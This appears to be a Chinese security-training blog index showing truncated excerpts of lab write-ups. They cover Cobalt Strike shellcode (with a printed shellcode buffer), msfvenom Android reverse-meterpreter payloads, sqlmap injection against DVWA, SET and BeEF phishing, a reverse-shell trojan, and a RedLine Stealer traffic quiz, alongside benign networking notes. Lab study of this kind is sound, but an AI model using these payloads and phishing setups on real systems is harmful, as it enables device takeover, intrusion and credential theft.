浏览须知 本站源站 IP 可能在香港/新加坡/德国/美国，所以推荐使用科学上网浏览本站，提高访问速度和稳定性。 推荐使用 PC 端/Pad 端等大屏设备浏览，以获得最佳阅读体验。 本站所有文章均为原创。 本站所有文章仅代表作者个人观点。 本站所有文章仅供学习交流，不得用于商业用途。 本站所有文章仅供个人学习交流，不得转载或用于任何商业用途。 隐私政策： 尊敬的用户： 感谢您访问我们的网站。我们非常重视您的隐私保护和个人信息安全。请在使用我们的服务之前仔细阅读本隐私政策，以了解我们收集、使用、存储和保护您的个人信息的方式。 信息收集与使用： 我们可能会收集您的部分个人信息，包括但不限于您的IP地址、浏览器类型、操作系统、访问时间、访问页面等信息，以优化网站性能并提供更好的服务。我们承诺不会将您的个人信息用于任何其他目的，也不会与任何第三方共享，除非经过您的明确授权或法律要求。 Cookie和数据分析： 我们可能会使用Cookie技术和第三方数据分析工具，来收集和分析用户的行为数据，以改善用户体验和网站服务质量。这些数据将被用于统计分析和用户行为研究，不会涉及个 ...

cs shellcode 打开 1java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar 查看生成的 payload 123# length: 894 bytesbuf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42 ...

查看 Metasploit 工具中可以在 Android 系统下使用的 payload 类型 这些 payload 可以作为我们后面攻击的软件的生成工具 端口映射问题 如果我们的手机与使用的计算机处在同一局域网，但是虚拟机使用的是 NAT 模式。那么只有我们使用的计算机才可以访问到该虚拟机，其他设备都是无法访问该虚拟机的。那么就需要端口映射了 假设计算机的 IP 为（192.168.1.100）。Android 手机的 IP 为（192.168.1.*）。虚拟机的 IP 为（192.168.169.130）： 第一步：打开 VMware 虚拟机网络编辑器 第二步：设置端口的映射（设置之后，凡是发往计算机 9999 端口的流量都会转发到虚拟机的 9999 端口上，这样虚拟机就能够接收到 Android 的连接了） 远程控制 Android 手机演示 本案例中，Linux 采用桥接模式，与 Android 手机连接在同一局域网中 使用 msfvenom 命令生成被控端 payload 第一步：下面我以“android/meterpreter/reverse ...

下载 CS 我这里之前网络安全协会讲座测试环境的时候装过一次汉化版，考虑到实验环境，再下个老师给的 CS 运行服务端 12345678给予服务端程序 teamserver 执行权限（在 linux 中复制进来的文件默认是没有执行权限的）chmod +x teamserver # 可以查看 kali 的 IP 地址（可选）ifconfig eth0 # # 运行服务端程序，192.168.0.104 是本机 IP，user 是要设置的连接密码（可改）./teamserver 192.168.0.104 user 报错了，搜了一下，配置 java 环境变量：java 安装常见问题之 Kali 永久配置环境变量_kali 环境变量-CSDN 博客 好吧还是不行，用我之前的版本的 新建配置文件，连接 CS 服务器 1java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstri ...

抓包 我是 png 文件，搜索 8950 找到十六进制字符 继续跟进 删除多余数据 查看图片 可以看到已经抓取成功了，由于 QQ 压缩机制导致图片丢失内容过多 原因与纠错 测试发现从本机向其他人发送的图片会被切割，现在从手机端发给我的电脑 再次抓包发现得到了全部的内容没有被切割。 删除多余数据 保存查看

加密 exp 12345678910111213141516171819202122232425262728293031323334353637383940414243import hashlibimport osdef generate_salt(length=16): """生成指定长度的盐值""" return os.urandom(length)def md5_hash_with_salt(input_string, salt=None): """计算带盐值的MD5哈希""" if salt is None: salt = generate_salt() hasher = hashlib.md5() # 将输入字符串与盐值结合 hasher.update(input_string.encode("utf-8") + salt) # 获取哈希值 hash_value = ha ...

网络安全实训 6——SQL 注入 安装环境 知新平台的文档图片无法加载 查看源码发现是外部引用，尝试恢复 恢复成功 开启 OWASP 靶机和 Kali 虚拟机 登录 dvwa 安全等级调 low 进入 SQL Injection（Blind）页面 随意输入一个数字，然后点击提交 安装 SQLmap 我用的是裸机当攻击机，所以安装个 SQLmap 用 F12 打开开发者工具 选中 Storage（存储）选项卡，找到 cookies，复制其中 PHPSESSID 的值（获取 cookies） 得到 59mb9spqvkd9cuk543thagtsd5 由于浏览器提交方式为 get 型，sqlmap 采用-u 命令。将刚才复制的 URL 和 COOKIE 写入命令 出错了，查看 Github 的 README 发现是需要前面加 python 运行 找到注入点 为了查看有哪些数据库，输入命令： python sqlmap.py -u "http://192.168.189.134/dvwa/vulnerabilities/sqli_blind/?id=1&am ...

拓扑图 配置 PC0 配置 server0 配置路由器 ping测试 配置router1 ping测试

Crossing the Line Unit 42 Wireshark Quiz for RedLine Stealer Quiz Questions What is the date and time in UTC the infection started? 感染开始的 UTC 日期和时间是什么时候？ 感染于 2023 年 7 月 10 日 22：39 UTC 开始。 What is the IP address of the infected Windows client? 受感染的 Windows 客户端的 IP 地址是什么？ 受感染的 Windows 客户端 IP 地址：10.7.10 [.] 47 What is the MAC address of the infected Windows client? 受感染的 Windows 客户端的 MAC 地址是什么？ 受感染的 Windows 客户端 MAC 地址：80：86：5b：ab：1e：c4 What is the hostname of the infected Windows client? 受感染的 ...

Web 站点克隆钓鱼 启动 SET 选择模块 Payload 选择 Payload 设置 返回数据 不知道为啥返回的是 HTML 源码，但是后台可以看到数据 把这段源码保存到本地打开就是登录界面

生成木马程序 设置 IP 和端口 运行木马 反弹 shell ADD +DEL+UPLOAD+DOWNDOAD

标准 IP 访问控制列表配置 实验目标 理解标准 IP 访问控制列表的原理及功能 掌握编号的标准 IP 访问控制列表的配置方法 实验背景 网络配置要求 公司的经理部、财务部和销售部门分属于不同的 3 个网段。三部门之间使用路由器进行信息传递。为了安全起见，公司领导要求以下访问控制： 销售部门不能对财务部进行访问。 经理部可以对财务部进行访问。 部门主机代表 PC1: 经理部的主机 PC2: 销售部的主机 PC3: 财务部的主机 技术原理 接入控制列表 (Access Control Lists, ACLs) 接入控制列表（ACLs），也称访问控制列表（Access Lists），俗称防火墙，在有的文档中还称包过滤。ACLs 通过定义一些规则对网络设备接口上的数据包进行控制，允许通过或丢弃，从而提高网络可管理性和安全性。 IP ACL 分类 IP ACL 分为两种：标准 IP 访问列表和扩展 IP 访问列表。 标准 IP 访问列表：编号范围为 1～99、1300～1999。可以根据数据包的源 IP 地址定义规则，进行数据包的过滤。 扩展 IP 访问列表：编号范围为 ...

网络钓鱼攻击 可能需要的：kali Linux 切换镜像源 安装并启动 利用 BeEF 进行网页钓鱼攻击 利用 nodejs 开启静态服务 补充利用 nodejs 开启静态服务 12sudo apt updatesudo apt install nodejs npm 安装完成后进入你的静态文件所在目录 开启命令行 1http-server 成功上线 发送警告命令 通过 flash 钓鱼获取目标控制权 1msf6 > handler -H 127.0.0.1 -P 4444 -p windows/meterpreter/reverse_tcp

apt-get update 更新索引 1apt-get update apt-get upgrade 更新软件 1apt-get upgrade apt-get dist-upgrade 升级 1apt-get dist-upgrade apt-get clean 删除缓存包 1apt-get clean apt-get autoclean 删除未安装的 deb 包 1apt-get autoclean